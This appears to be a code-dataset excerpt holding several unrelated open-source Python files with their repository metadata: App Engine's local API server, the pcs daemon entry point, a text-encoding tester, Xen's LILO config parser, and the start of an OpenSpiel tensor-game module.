image urls on calls to images.GetUrlBase.
logs_path: Path to the file to store the logs data in.
mail_smtp_host: The SMTP hostname that should be used when sending e-mails.
If None then the mail_enable_sendmail argument is considered.
mail_smtp_port: The SMTP port number that should be used when sending
e-mails. If this value is None then mail_smtp_host must also be None.
mail_smtp_user: The username to use when authenticating with the
SMTP server. This value may be None if mail_smtp_host is also None or if
the SMTP server does not require authentication.
mail_smtp_password: The password to use when authenticating with the
SMTP server. This value may be None if mail_smtp_host or mail_smtp_user
is also None.
mail_enable_sendmail: A bool indicating if sendmail should be used when
sending e-mails. This argument is ignored if mail_smtp_host is not None.
mail_show_mail_body: A bool indicating whether the body of sent e-mails
should be written to the logs.
mail_allow_tls: A bool indicating whether to allow TLS support.
matcher_prospective_search_path: The path to the file that should be used to
save prospective search subscriptions.
taskqueue_auto_run_tasks: A bool indicating whether taskqueue tasks should
be run automatically or it the must be manually triggered.
taskqueue_task_retry_seconds: An int representing the number of seconds to
wait before a retrying a failed taskqueue task.
taskqueue_default_http_server: A str containing the address of the http
server that should be used to execute tasks.
user_login_url: A str containing the url that should be used for user login.
user_logout_url: A str containing the url that should be used for user
logout.
default_gcs_bucket_name: A str overriding the usual default bucket name.
"""
os.environ['APPLICATION_ID'] = app_id
tmp_app_identity_stub = app_identity_stub.AppIdentityServiceStub.Create(
email_address=appidentity_email_address,
private_key_path=appidentity_private_key_path)
if default_gcs_bucket_name is not None:
tmp_app_identity_stub.SetDefaultGcsBucketName(default_gcs_bucket_name)
apiproxy_stub_map.apiproxy.RegisterStub(
'app_identity_service', tmp_app_identity_stub)
blob_storage = file_blob_storage.FileBlobStorage(blobstore_path, app_id)
apiproxy_stub_map.apiproxy.RegisterStub(
'blobstore',
blobstore_stub.BlobstoreServiceStub(blob_storage))
apiproxy_stub_map.apiproxy.RegisterStub(
'capability_service',
capability_stub.CapabilityServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'channel',
channel_service_stub.ChannelServiceStub())
if use_sqlite:
datastore = datastore_sqlite_stub.DatastoreSqliteStub(
app_id,
datastore_path,
datastore_require_indexes,
trusted,
root_path=application_root,
auto_id_policy=auto_id_policy)
else:
datastore = datastore_file_stub.DatastoreFileStub(
app_id,
datastore_path,
datastore_require_indexes,
trusted,
root_path=application_root,
auto_id_policy=auto_id_policy)
if high_replication:
datastore.SetConsistencyPolicy(
datastore_stub_util.TimeBasedHRConsistencyPolicy())
apiproxy_stub_map.apiproxy.RegisterStub(
'datastore_v3', datastore)
apiproxy_stub_map.apiproxy.RegisterStub(
'datastore_v4',
datastore_v4_stub.DatastoreV4Stub(app_id))
apiproxy_stub_map.apiproxy.RegisterStub(
'file',
file_service_stub.FileServiceStub(blob_storage))
try:
from google.appengine.api.images import images_stub
except ImportError:
from google.appengine.api.images import images_not_implemented_stub
apiproxy_stub_map.apiproxy.RegisterStub(
'images',
images_not_implemented_stub.ImagesNotImplementedServiceStub())
else:
apiproxy_stub_map.apiproxy.RegisterStub(
'images',
images_stub.ImagesServiceStub(host_prefix=images_host_prefix))
apiproxy_stub_map.apiproxy.RegisterStub(
'logservice',
logservice_stub.LogServiceStub(logs_path=logs_path))
apiproxy_stub_map.apiproxy.RegisterStub(
'mail',
mail_stub.MailServiceStub(mail_smtp_host,
mail_smtp_port,
mail_smtp_user,
mail_smtp_password,
enable_sendmail=mail_enable_sendmail,
show_mail_body=mail_show_mail_body,
allow_tls=mail_allow_tls))
apiproxy_stub_map.apiproxy.RegisterStub(
'memcache',
memcache_stub.MemcacheServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'search',
simple_search_stub.SearchServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub('system',
system_stub.SystemServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'taskqueue',
taskqueue_stub.TaskQueueServiceStub(
root_path=application_root,
auto_task_running=taskqueue_auto_run_tasks,
task_retry_seconds=taskqueue_task_retry_seconds,
default_http_server=taskqueue_default_http_server))
apiproxy_stub_map.apiproxy.GetStub('taskqueue').StartBackgroundExecution()
apiproxy_stub_map.apiproxy.RegisterStub(
'urlfetch',
urlfetch_stub.URLFetchServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'user',
user_service_stub.UserServiceStub(login_url=user_login_url,
logout_url=user_logout_url))
apiproxy_stub_map.apiproxy.RegisterStub(
'xmpp',
xmpp_service_stub.XmppServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'matcher',
prospective_search_stub.ProspectiveSearchStub(
matcher_prospective_search_path,
apiproxy_stub_map.apiproxy.GetStub('taskqueue')))
def _TearDownStubs():
"""Clean up any stubs that need cleanup."""
logging.info('Applying all pending transactions and saving the datastore')
datastore_stub = apiproxy_stub_map.apiproxy.GetStub('datastore_v3')
datastore_stub.Write()
def ParseCommandArguments(args):
"""Parses and the application's command line arguments.
Args:
args: A list of command line arguments *not* including the executable or
script e.g. ['-A' 'myapp', '--api_port=8000'].
Returns:
An object containing the values passed in the commandline as attributes.
Raises:
SystemExit: if the argument parsing fails.
"""
import argparse
from google.appengine.tools import boolean_action
parser = argparse.ArgumentParser()
parser.add_argument('-A', '--application', required=True)
parser.add_argument('--api_host', default='')
parser.add_argument('--api_port', default=8000, type=int)
parser.add_argument('--trusted',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--appidentity_email_address', default=None)
parser.add_argument('--appidentity_private_key_path', default=None)
parser.add_argument('--application_root', default=None)
parser.add_argument('--application_host', default='localhost')
parser.add_argument('--application_port', default=None)
parser.add_argument('--blobstore_path', default=None)
parser.add_argument('--datastore_path', default=None)
parser.add_argument('--auto_id_policy', default='scattered',
type=lambda s: s.lower(),
choices=(datastore_stub_util.SEQUENTIAL,
datastore_stub_util.SCATTERED))
parser.add_argument('--use_sqlite',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--high_replication',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--require_indexes',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--clear_datastore',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--logs_path', default=None)
parser.add_argument('--enable_sendmail',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--smtp_host', default='')
parser.add_argument('--smtp_port', default=25, type=int)
parser.add_argument('--smtp_user', default='')
parser.add_argument('--smtp_password', default='')
parser.add_argument('--show_mail_body',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--smtp_allow_tls',
action=boolean_action.BooleanAction,
const=True,
default=True)
parser.add_argument('--prospective_search_path', default=None)
parser.add_argument('--clear_prospective_search',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--enable_task_running',
action=boolean_action.BooleanAction,
const=True,
default=True)
parser.add_argument('--task_retry_seconds', default=30, type=int)
parser.add_argument('--user_login_url', default=None)
parser.add_argument('--user_logout_url', default=None)
return parser.parse_args(args)
class APIServerProcess(object):
"""Manages an API Server running as a seperate process."""
def __init__(self,
executable,
host,
port,
app_id,
script=None,
appidentity_email_address=None,
appidentity_private_key_path=None,
application_host=None,
application_port=None,
application_root=None,
auto_id_policy=None,
blobstore_path=None,
clear_datastore=None,
clear_prospective_search=None,
datastore_path=None,
enable_sendmail=None,
enable_task_running=None,
high_replication=None,
logs_path=None,
prospective_search_path=None,
require_indexes=None,
show_mail_body=None,
smtp_host=None,
smtp_password=None,
smtp_port=None,
smtp_user=None,
smtp_allow_tls=None,
task_retry_seconds=None,
trusted=None,
use_sqlite=None,
default_gcs_bucket_name=None):
"""Configures the APIs hosted by this server.
Args:
executable: The path of the executable to use when running the API Server
e.g. "/usr/bin/python".
host: The host name that should be used by the API Server e.g.
"localhost".
port: The port number that should be used by the API Server e.g. 8080.
app_id: The str application id e.g. "guestbook".
script: The name of the script that should be used, along with the
executable argument, to run the API Server e.g. "api_server.py".
If None then the executable is run without a script argument.
appidentity_email_address: Email address for service account substitute.
appidentity_private_key_path: Private key for service account substitute.
application_host: The name of the host where the development application
server is running e.g. "localhost".
application_port: The port where the application server is running e.g.
8000.
application_root: The path to the directory containing the user's
application e.g. "/home/bquinlan/myapp".
auto_id_policy: One of "sequential" or "scattered", indicating whether
the Datastore stub should assign IDs sequentially or scattered.
blobstore_path: The path to the file that should be used for blobstore
storage.
clear_datastore: Clears the file at datastore_path, emptying the
datastore from previous runs.
clear_prospective_search: Clears the file at prospective_search_path,
emptying the perspective search state from previous runs.
datastore_path: The path to the file that should be used for datastore
storage.
enable_sendmail: A bool indicating if sendmail should be used when sending
e-mails. This argument is ignored if mail_smtp_host is not None.
enable_task_running: A bool indicating whether taskqueue tasks should
be run automatically or it the must be manually triggered.
high_replication: A bool indicating whether to use the high replication
consistency model.
logs_path: Path to the file to store the logs data in.
prospective_search_path: The path to the file that should be used to
save prospective search subscriptions.
require_indexes: A bool indicating if the same production
datastore indexes requirements should be enforced i.e. if True then
a google.appengine.ext.db.NeedIndexError will be be raised if a query
is executed without the required indexes.
show_mail_body: A bool indicating whether the body of sent e-mails
should be written to the logs.
smtp_host: The SMTP hostname that should be used when sending e-mails.
If None then the enable_sendmail argument is considered.
smtp_password: The password to use when authenticating with the
SMTP server. This value may be None if smtp_host or smtp_user
is also None.
smtp_port: The SMTP port number that should be used when sending
e-mails. If this value is None then smtp_host must also be None.
smtp_user: The username to use when authenticating with the
SMTP server. This value may be None if smtp_host is also None or if
the SMTP server does not require authentication.
smtp_allow_tls: A bool indicating whether to enable TLS.
task_retry_seconds: An int representing the number of seconds to
wait before a retrying a failed taskqueue task.
trusted: A bool indicating if privileged APIs should be made available.
use_sqlite: A bool indicating whether DatastoreSqliteStub or
DatastoreFileStub should be used.
default_gcs_bucket_name: A str overriding the normal default bucket name.
"""
self._process = None
self._host = host
self._port = port
if script:
self._args = [executable, script]
else:
self._args = [executable]
self._BindArgument('--api_host', host)
self._BindArgument('--api_port', port)
self._BindArgument('--appidentity_email_address', appidentity_email_address)
self._BindArgument('--appidentity_private_key_path', appidentity_private_key_path)
self._BindArgument('--application_host', application_host)
self._BindArgument('--application_port', application_port)
self._BindArgument('--application_root', application_root)
self._BindArgument('--application', app_id)
self._BindArgument('--auto_id_policy', auto_id_policy)
self._BindArgument('--blobstore_path', blobstore_path)
self._BindArgument('--clear_datastore', clear_datastore)
self._BindArgument('--clear_prospective_search', clear_prospective_search)
self._BindArgument('--datastore_path', datastore_path)
self._BindArgument('--enable_sendmail', enable_sendmail)
self._BindArgument('--enable_task_running', enable_task_running)
self._BindArgument('--high_replication', high_replication)
self._BindArgument('--logs_path', logs_path)
self._BindArgument('--prospective_search_path', prospective_search_path)
self._BindArgument('--require_indexes', require_indexes)
self._BindArgument('--show_mail_body', show_mail_body)
self._BindArgument('--smtp_host', smtp_host)
self._BindArgument('--smtp_password', smtp_password)
self._BindArgument('--smtp_port', smtp_port)
self._BindArgument('--smtp_user', smtp_user)
self._BindArgument('--smtp_allow_tls', smtp_allow_tls)
self._BindArgument('--task_retry_seconds', task_retry_seconds)
self._BindArgument('--trusted', trusted)
self._BindArgument('--use_sqlite', use_sqlite)
self._BindArgument('--default_gcs_bucket_name', default_gcs_bucket_name)
@property
def url(self):
"""Returns the URL that should be used to communicate with the server."""
return 'http://%s:%d' % (self._host, self._port)
def __repr__(self):
return '<APIServerProcess command=%r>' % ' '.join(self._args)
def Start(self):
"""Starts the API Server process."""
assert not self._process, 'Start() can only be called once'
self._process = subprocess.Popen(self._args)
def _CanConnect(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self._host, self._port))
except socket.error:
connected = False
else:
connected = True
s.close()
return connected
def WaitUntilServing(self, timeout=30.0):
"""Waits until the API Server is ready to handle requests.
Args:
timeout: The maximum number of seconds to wait for the server to be ready.
Raises:
Error: if the server process exits or is not ready in "timeout" seconds.
"""
assert self._process, 'server was not started'
finish_time = time.time() + timeout
while time.time() < finish_time:
if self._process.poll() is not None:
raise Error('server has already exited with return: %r',
self._process.returncode)
if self._CanConnect():
return
time.sleep(0.2)
raise Error('server did not start after %f seconds', timeout)
def _BindArgument(self, argument, value):
if value is not None:
self._args.append('%s=%s' % (argument, value))
def Quit(self, timeout=5.0):
"""Causes the API Server process to exit.
Args:
timeout: The maximum number of seconds to wait for an orderly shutdown
before forceably killing the process.
"""
assert self._process, 'server was not started'
if self._process.poll() is None:
try:
urllib2.urlopen(self.url + QUIT_PATH)
except urllib2.URLError:
pass
finish_time = time.time() + timeout
while time.time() < finish_time and self._process.poll() is None:
time.sleep(0.2)
if self._process.returncode is None:
logging.warning('api_server did not quit cleanly, killing')
self._process.kill()
class ApiServerDispatcher(request_info._LocalFakeDispatcher):
"""An api_server Dispatcher implementation."""
def add_request(self, method, relative_url, headers, body, source_ip,
server_name=None, version=None, instance_id=None):
"""Process an HTTP request.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
server_name: An optional str containing the server name to service this
request. If unset, the request will be dispatched to the default
server.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the server and version.
Returns:
A request_info.ResponseTuple containing the response information for the
HTTP request.
"""
try:
header_dict = wsgiref.headers.Headers(headers)
connection_host = header_dict.get('host')
connection = httplib.HTTPConnection(connection_host)
connection.putrequest(
method, relative_url,
skip_host='host' in header_dict,
skip_accept_encoding='accept-encoding' in header_dict)
for header_key, header_value in headers:
connection.putheader(header_key, header_value)
connection.endheaders()
connection.send(body)
response = connection.getresponse()
response.read()
response.close()
return request_info.ResponseTuple(
'%d %s' % (response.status, response.reason), [], '')
except (httplib.HTTPException, socket.error):
logging.exception(
'An error occured while sending a %s request to "%s%s"',
method, connection_host, relative_url)
return request_info.ResponseTuple('0', [], '')
def main():
logging.basicConfig(
level=logging.INFO,
format='[API Server] [%(filename)s:%(lineno)d] %(levelname)s %(message)s')
args = ParseCommandArguments(sys.argv[1:])
if args.clear_datastore:
_ClearDatastoreStorage(args.datastore_path)
if args.clear_prospective_search:
_ClearProspectiveSearchStorage(args.prospective_search_path)
if args.blobstore_path is None:
_, blobstore_temp_filename = tempfile.mkstemp(prefix='ae-blobstore')
args.blobstore_path = blobstore_temp_filename
if args.datastore_path is None:
_, datastore_temp_filename = tempfile.mkstemp(prefix='ae-datastore')
args.datastore_path = datastore_temp_filename
if args.prospective_search_path is None:
_, prospective_search_temp_filename = tempfile.mkstemp(
prefix='ae-prospective_search')
args.prospective_search_path = prospective_search_temp_filename
if args.application_host:
application_address = args.application_host
if args.application_port and args.application_port != 80:
application_address += ':' + str(args.application_port)
else:
application_address = None
if not hasattr(args, 'default_gcs_bucket_name'):
args.default_gcs_bucket_name = None
request_info._local_dispatcher = ApiServerDispatcher()
_SetupStubs(app_id=args.application,
application_root=args.application_root,
appidentity_email_address=args.appidentity_email_address,
appidentity_private_key_path=args.appidentity_private_key_path,
trusted=args.trusted,
blobstore_path=args.blobstore_path,
datastore_path=args.datastore_path,
use_sqlite=args.use_sqlite,
auto_id_policy=args.auto_id_policy,
high_replication=args.high_replication,
datastore_require_indexes=args.require_indexes,
images_host_prefix=application_address,
logs_path=args.logs_path,
mail_smtp_host=args.smtp_host,
mail_smtp_port=args.smtp_port,
mail_smtp_user=args.smtp_user,
mail_smtp_password=args.smtp_password,
mail_enable_sendmail=args.enable_sendmail,
mail_show_mail_body=args.show_mail_body,
mail_allow_tls=args.smtp_allow_tls,
matcher_prospective_search_path=args.prospective_search_path,
taskqueue_auto_run_tasks=args.enable_task_running,
taskqueue_task_retry_seconds=args.task_retry_seconds,
taskqueue_default_http_server=application_address,
user_login_url=args.user_login_url,
user_logout_url=args.user_logout_url,
default_gcs_bucket_name=args.default_gcs_bucket_name)
server = APIServer((args.api_host, args.api_port), args.application)
try:
server.serve_forever()
finally:
_TearDownStubs()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
|
ychen820/microblog
|
y/google-cloud-sdk/platform/google_appengine/google/appengine/tools/api_server.py
|
Python
|
bsd-3-clause
| 33,071 | 0.006108 |
import os
import signal
import socket
from pathlib import Path
from tornado.ioloop import IOLoop
from tornado.locks import Lock
from tornado.web import Application
from pcs import settings
from pcs.daemon import log, ruby_pcsd, session, ssl, systemd
from pcs.daemon.app import sinatra_ui, sinatra_remote, ui
from pcs.daemon.app.common import RedirectHandler
from pcs.daemon.env import prepare_env
from pcs.daemon.http_server import HttpsServerManage
class SignalInfo:
# pylint: disable=too-few-public-methods
server_manage = None
ioloop_started = False
def handle_signal(incomming_signal, frame):
# pylint: disable=unused-argument
log.pcsd.warning("Caught signal: %s, shutting down", incomming_signal)
if SignalInfo.server_manage:
SignalInfo.server_manage.stop()
if SignalInfo.ioloop_started:
IOLoop.current().stop()
raise SystemExit(0)
def sign_ioloop_started():
SignalInfo.ioloop_started = True
def config_sync(sync_config_lock: Lock, ruby_pcsd_wrapper: ruby_pcsd.Wrapper):
async def config_synchronization():
async with sync_config_lock:
next_run_time = await ruby_pcsd_wrapper.sync_configs()
IOLoop.current().call_at(next_run_time, config_synchronization)
return config_synchronization
def configure_app(
session_storage: session.Storage,
ruby_pcsd_wrapper: ruby_pcsd.Wrapper,
sync_config_lock: Lock,
public_dir,
disable_gui=False,
debug=False,
):
def make_app(https_server_manage: HttpsServerManage):
"""
https_server_manage -- allows to controll the server (specifically
reload its SSL certificates). A relevant handler should get this
object via the method `initialize`.
"""
routes = sinatra_remote.get_routes(
ruby_pcsd_wrapper,
sync_config_lock,
https_server_manage,
)
if not disable_gui:
routes.extend(
# old web ui by default
[(r"/", RedirectHandler, dict(url="/manage"))]
+ [(r"/ui", RedirectHandler, dict(url="/ui/"))]
+ ui.get_routes(
url_prefix="/ui/",
app_dir=os.path.join(public_dir, "ui"),
fallback_page_path=os.path.join(
public_dir,
"ui_instructions.html",
),
session_storage=session_storage,
)
+ sinatra_ui.get_routes(
session_storage, ruby_pcsd_wrapper, public_dir
)
)
return Application(routes, debug=debug)
return make_app
def main():
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
Path(settings.pcsd_log_location).touch(mode=0o600, exist_ok=True)
log.setup(settings.pcsd_log_location)
env = prepare_env(os.environ, log.pcsd)
if env.has_errors:
raise SystemExit(1)
if env.PCSD_DEBUG:
log.enable_debug()
sync_config_lock = Lock()
ruby_pcsd_wrapper = ruby_pcsd.Wrapper(
settings.pcsd_ruby_socket,
debug=env.PCSD_DEBUG,
)
make_app = configure_app(
session.Storage(env.PCSD_SESSION_LIFETIME),
ruby_pcsd_wrapper,
sync_config_lock,
env.PCSD_STATIC_FILES_DIR,
disable_gui=env.PCSD_DISABLE_GUI,
debug=env.PCSD_DEV,
)
pcsd_ssl = ssl.PcsdSSL(
server_name=socket.gethostname(),
cert_location=settings.pcsd_cert_location,
key_location=settings.pcsd_key_location,
ssl_options=env.PCSD_SSL_OPTIONS,
ssl_ciphers=env.PCSD_SSL_CIPHERS,
)
try:
SignalInfo.server_manage = HttpsServerManage(
make_app,
port=env.PCSD_PORT,
bind_addresses=env.PCSD_BIND_ADDR,
ssl=pcsd_ssl,
).start()
except socket.gaierror as e:
log.pcsd.error(
"Unable to bind to specific address(es), exiting: %s ", e
)
raise SystemExit(1) from e
except OSError as e:
log.pcsd.error("Unable to start pcsd daemon, exiting: %s ", e)
raise SystemExit(1) from e
except ssl.SSLCertKeyException as e:
for error in e.args:
log.pcsd.error(error)
log.pcsd.error("Invalid SSL certificate and/or key, exiting")
raise SystemExit(1) from e
ioloop = IOLoop.current()
ioloop.add_callback(sign_ioloop_started)
if systemd.is_systemd() and env.NOTIFY_SOCKET:
ioloop.add_callback(systemd.notify, env.NOTIFY_SOCKET)
ioloop.add_callback(config_sync(sync_config_lock, ruby_pcsd_wrapper))
ioloop.start()
|
feist/pcs
|
pcs/daemon/run.py
|
Python
|
gpl-2.0
| 4,728 | 0 |
#!/usr/bin/env python
'''
*******************************************************************************
Description: This tool can help you determine the character
encoding of a text file by converting one line from
the file to every(?) possible character encoding.
It writes the converted lines to a new text file
using the same filename but appending the
extension '.encodings' to it.
You have to examine this file visually to find the
correct encoding.
Usage : test_encodings.py filename [number of line to test]
Licence : Public Domain.
Author : Antonios Tsolis (2016)
*******************************************************************************
'''
import io
import os
import sys
from encodings.aliases import aliases
encs = {
"ascii", "big5", "big5hkscs",
"cp037", "cp424", "cp437", "cp500", "cp720", "cp737", "cp775",
"cp850", "cp852", "cp855", "cp856", "cp857", "cp858", "cp860",
"cp861", "cp862", "cp863", "cp864", "cp865", "cp866", "cp869",
"cp874", "cp875", "cp932", "cp949", "cp950",
"cp1006", "cp1026", "cp1140", "cp1250", "cp1251", "cp1252",
"cp1253", "cp1254", "cp1255", "cp1256", "cp1257", "cp1258",
"euc_jp", "euc_jis_2004", "euc_jisx0213", "euc_kr",
"gb2312", "gbk", "gb18030", "hz",
"iso2022_jp", "iso2022_jp_1", "iso2022_jp_2", "iso2022_jp_2004",
"iso2022_jp_3", "iso2022_jp_ext", "iso2022_kr",
"latin_1", "iso8859_2", "iso8859_3", "iso8859_4", "iso8859_5",
"iso8859_6", "iso8859_7", "iso8859_8", "iso8859_9", "iso8859_10",
"iso8859_13", "iso8859_14", "iso8859_15", "iso8859_16",
"johab", "koi8_r", "koi8_u",
"mac_cyrillic", "mac_greek", "mac_iceland",
"mac_latin2", "mac_roman", "mac_turkish",
"ptcp154", "shift_jis", "shift_jis_2004", "shift_jisx0213",
"utf_32", "utf_32_be", "utf_32_le",
"utf_16", "utf_16_be", "utf_16_le",
"utf_7", "utf_8", "utf_8_sig",
"idna", "mbcs", "palmos", "punycode", "rot_13",
"raw_unicode_escape", "unicode_escape", "unicode_internal",
"base64_codec", "bz2_codec", "hex_codec", "uu_codec", "zlib_codec"
}
def write_encodings(filename, line_number, final_encoding):
# To ensure that we cover as many as possible encodings,
# we take the union between our predefined encoding set and the
# set of the values from the encodings.aliases.aliases.
encodings = encs.union(set(aliases.values()))
data = dict()
# Read line from file
try:
with io.open(filename, "rb") as f:
lines = f.readlines()
line = lines[line_number-1]
print("\nProcessing line number: " + str(line_number))
if len(line) < 3:
print("!!!Warning!!!: Possible empty line.")
print("")
except Exception:
_, err, _ = sys.exc_info()
print("Error reading " + filename)
print(err)
sys.exit(1)
# Decode it using every possible encoding
for enc in encodings:
try:
data[enc] = line.decode(enc)
except Exception:
_, err, _ = sys.exc_info()
print("Cannot decode using " + enc)
# print(err)
# We write the results in a new utf-8 text file
# We use the same filename + an '.encodings' extension
fpath = os.path.abspath(filename)
newfilename = fpath + '.encodings'
print("\nWriting successfully tested encodings in " + newfilename)
with open(newfilename, 'w') as out:
c = 0
for enc in sorted(data.keys()):
try:
out.write("%-20s" % enc)
if (sys.version_info[0] < 3):
line = data[enc].encode(final_encoding)
else:
line = data[enc]
out.write(line)
out.write(os.linesep)
c += 1
except Exception:
_, err, _ = sys.exc_info()
print("Cannot encode " + enc + " to " + final_encoding)
# print(err)
print("\n" + str(c) + " out of " + str(len(encodings)) +
" tested encodings were written.\n")
if __name__ == '__main__':
nargs = len(sys.argv)-1
if nargs < 1 or nargs > 2:
exit("Usage: test_encodings.py filename [number of line to test]")
if nargs == 2:
line_number = int(sys.argv[2])
else:
line_number = 1
write_encodings(sys.argv[1], line_number, 'utf_8')
|
Alamot/code-snippets
|
encodings/test_encodings.py
|
Python
|
unlicense
| 4,814 | 0.00187 |
#
#LiloConf.py
#
import sys, re, os
import logging
import GrubConf
class LiloImage(object):
def __init__(self, lines, path):
self.reset(lines, path)
def __repr__(self):
return ("title: %s\n"
" root: %s\n"
" kernel: %s\n"
" args: %s\n"
" initrd: %s\n" %(self.title, self.root, self.kernel,
self.args, self.initrd))
def reset(self, lines, path):
self._initrd = self._kernel = self._readonly = None
self._args = ""
self.title = ""
self.lines = []
self.path = path
self.root = ""
map(self.set_from_line, lines)
def set_from_line(self, line, replace = None):
(com, arg) = GrubConf.grub_exact_split(line, 2)
if self.commands.has_key(com):
if self.commands[com] is not None:
setattr(self, self.commands[com], re.sub('^"(.+)"$', r"\1", arg.strip()))
else:
logging.info("Ignored image directive %s" %(com,))
else:
logging.warning("Unknown image directive %s" %(com,))
# now put the line in the list of lines
if replace is None:
self.lines.append(line)
else:
self.lines.pop(replace)
self.lines.insert(replace, line)
def set_kernel(self, val):
self._kernel = (None, self.path + "/" + val)
def get_kernel(self):
return self._kernel
kernel = property(get_kernel, set_kernel)
def set_initrd(self, val):
self._initrd = (None, self.path + "/" + val)
def get_initrd(self):
return self._initrd
initrd = property(get_initrd, set_initrd)
def set_args(self, val):
self._args = val
def get_args(self):
args = self._args
if self.root:
args += " root=" + self.root
if self.readonly:
args += " ro"
return args
args = property(get_args, set_args)
def set_readonly(self, val):
self._readonly = 1
def get_readonly(self):
return self._readonly
readonly = property(get_readonly, set_readonly)
# set up command handlers
commands = { "label": "title",
"root": "root",
"rootnoverify": "root",
"image": "kernel",
"initrd": "initrd",
"append": "args",
"read-only": "readonly",
"chainloader": None,
"module": None}
class LiloConfigFile(object):
def __init__(self, fn = None):
self.filename = fn
self.images = []
self.timeout = -1
self._default = 0
if fn is not None:
self.parse()
def parse(self, buf = None):
if buf is None:
if self.filename is None:
raise ValueError, "No config file defined to parse!"
f = open(self.filename, 'r')
lines = f.readlines()
f.close()
else:
lines = buf.split("\n")
path = os.path.dirname(self.filename)
img = []
for l in lines:
l = l.strip()
# skip blank lines
if len(l) == 0:
continue
# skip comments
if l.startswith('#'):
continue
# new image
if l.startswith("image"):
if len(img) > 0:
self.add_image(LiloImage(img, path))
img = [l]
continue
if len(img) > 0:
img.append(l)
continue
(com, arg) = GrubConf.grub_exact_split(l, 2)
if self.commands.has_key(com):
if self.commands[com] is not None:
setattr(self, self.commands[com], arg.strip())
else:
logging.info("Ignored directive %s" %(com,))
else:
logging.warning("Unknown directive %s" %(com,))
if len(img) > 0:
self.add_image(LiloImage(img, path))
def add_image(self, image):
self.images.append(image)
def _get_default(self):
for i in range(0, len(self.images) - 1):
if self.images[i].title == self._default:
return i
return 0
def _set_default(self, val):
self._default = val
default = property(_get_default, _set_default)
commands = { "default": "self.default",
"timeout": "self.timeout",
"prompt": None,
"relocatable": None,
}
if __name__ == "__main__":
if sys.argv < 2:
raise RuntimeError, "Need a grub.conf to read"
g = LiloConfigFile(sys.argv[1])
for i in g.images:
print i #, i.title, i.root, i.kernel, i.args, i.initrd
print g.default
|
mikesun/xen-cow-checkpointing
|
tools/pygrub/src/LiloConf.py
|
Python
|
gpl-2.0
| 4,887 | 0.006753 |
# Copyright 2019 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Big tensor games."""
from absl import logging # pylint:disable=unused-import
import numpy as np
from open_spiel.python.algorithms.adidas_utils.helpers import misc
class TensorGame(object):
"""Tensor Game."""
def __init__(self, pt, seed=None):
"""Ctor. Inits payoff tensor (players x actions x ... np.array).
Args:
pt: payoff tensor, np.array
seed: seed for random number generator, used if computing best responses
"""
if np.any(pt < 0.):
raise ValueError("Payoff tensor must contain non-negative values")
self.pt = pt
self.seed = seed
self.random = np.random.RandomState(seed)
def num_players(self):
return self.pt.shape[0]
def num_strategies(self):
return self.pt.shape[1:]
def payoff_tensor(self):
return self.pt
def get_payoffs_for_strategies(self, policies):
"""Return vector of payoffs for all players given list of strategies.
Args:
policies: list of integers indexing strategies for each player
Returns:
np.array (length num players) of payoffs
"""
return self.pt[tuple([slice(None)] + policies)]
def best_response(self, mixed_strategy, return_exp=False):
"""Return best response and its superiority over the current strategy.
Args:
mixed_strategy: np.ndarray (distribution over strategies)
return_exp: bool, whether to return how much best response exploits the
given mixed strategy (default is False)
Returns:
br: int, index of strategy (ties split randomly)
exp: u(br) - u(mixed_strategy)
"""
logging.warn("Assumes symmetric game! Returns br for player 0.")
gradient = misc.pt_reduce(self.pt[0],
[mixed_strategy] * self.num_players(),
[0])
br = misc.argmax(self.random, gradient)
exp = gradient.max() - gradient.dot(mixed_strategy)
if return_exp:
return br, exp
else:
return br
def best_population_response(self, dist, policies):
"""Returns the best response to the current population of policies.
Args:
dist: np.ndarray, distribution over policies
policies: list of integers indexing strategies for each player
Returns:
best response, exploitability tuple (see best_response)
"""
ns = self.num_strategies()
mixed_strat = np.zeros(ns)
for pure_strat, prob in zip(policies, dist):
mixed_strat[pure_strat] += prob
return self.best_response(mixed_strat)
class ElFarol(TensorGame):
"""N-Player, 2-Action symmetric game with unique symmetric Nash."""
def __init__(self, n=2, c=0.5, B=0, S=1, G=2, seed=None):
"""Ctor. Initializes payoff tensor (N x (2,) * N np.array).
See Section 3.1, The El Farol Stage Game in
http://www.econ.ed.ac.uk/papers/id186_esedps.pdf
action 0: go to bar
action 1: avoid bar
Args:
n: int, number of players
c: float, threshold for `crowded' as a fraction of number of players
B: float, payoff for going to a crowded bar
S: float, payoff for staying at home
G: float, payoff for going to an uncrowded bar
seed: seed for random number generator, used if computing best responses
"""
assert G > S > B, "Game parameters must satisfy G > S > B."
pt = np.zeros((n,) + (2,) * n)
for idx in np.ndindex(pt.shape):
p = idx[0]
a = idx[1:]
a_i = a[p]
go_to_bar = (a_i < 1)
crowded = (n - 1 - sum(a) + a_i) >= (c * n)
